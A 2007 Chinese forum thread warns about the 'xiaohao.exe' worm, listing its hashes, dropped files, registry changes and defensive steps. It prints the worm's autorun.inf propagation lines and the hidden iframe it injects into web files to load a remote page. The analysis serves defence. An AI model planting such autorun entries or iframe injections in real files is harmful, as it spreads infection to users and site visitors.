標題:
警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒)
[打印本頁]
作者:
cheecheong88
時間:
2007-11-20 08:03 AM
標題:
警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒)
ile: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
Size: 12288 bytes
File Version: 1, 0, 0, 1
Modified: 2007年8月14曰, 21:03:22
MD5: B50ED06B61CDCF060D0136784999E50C
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
CRC32: 5CC1E47A
加壳方式:UPX
病毒运行后:
1.生成如下文件:
%SystemRoot%\system32\exloroe.exe
每个分区下生成一个xiaohao.exe 和autorun.inf
autorun.inf内容
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
2.添加注册表项目
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB
-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
3.修改注册表键值
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\
Hidden\SHOWALL\CheckedValue为0x00000000
破坏显示隐藏文件
删除
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start
Menu2
从而删除开始菜单中所有的快捷方式
4.感染文件
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后
的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
exe无法修复
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部
加入代码
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0
height=0></iframe>
所有感染的文件的文件名记录在C:\Jilu.txt里面
并将所有未能感染的文件属性变为隐藏
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”
6.系统时间改为2005年1月17曰
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和
原先的兔子病毒很相像,为了炫耀。
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe
等核心启动文件被修改从而造成系统启动失败
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所
有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉
希望大家注意如下几点防范此类病毒
1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)
2.及时升级杀毒软件,防火墙,一定打全系统补丁
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行
“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管
理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性
里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可。
作者:
entrepreneur
時間:
2007-12-7 03:08 PM
甘点样清除啊。
歡迎光臨 公仔箱論壇 (http://5.39.217.76/)
Powered by Discuz! 7.0.0